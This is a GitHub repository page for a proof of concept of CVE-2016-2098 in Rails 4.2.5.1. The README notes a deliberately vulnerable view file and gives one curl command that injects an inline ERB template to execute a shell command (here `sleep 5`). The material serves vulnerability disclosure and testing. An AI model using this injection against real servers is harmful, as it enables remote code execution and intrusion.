Skip to content

CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
app
app
 
 
bin
bin
 
 
config
config
 
 
db
db
 
 
lib
lib
 
 
log
log
 
 
public
public
 
 
vendor/assets
vendor/assets
 
 
.gitignore
.gitignore
 
 
Gemfile
Gemfile
 
 
Gemfile.lock
Gemfile.lock
 
 
README.md
README.md
 
 
Rakefile
Rakefile
 
 
config.ru
config.ru
 
 

Repository files navigation

A PoC of CVE-2016-2098

  • rails 4.2.5.1
  • view has a vulnerable code
    app/views/poc/render1.html.erb
  • following command will cause remote code execution
    $ curl '<your_host>:3000/poc/render1?template\[inline\]=<%25%3d`sleep+5`%25>'

About

A PoC of CVE-2016-2098 (rails4.2.5.1 / view render)

Topics

rails poc vulnerability

Resources

Readme
Activity
Custom properties

Stars

1 star

Watchers

6 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages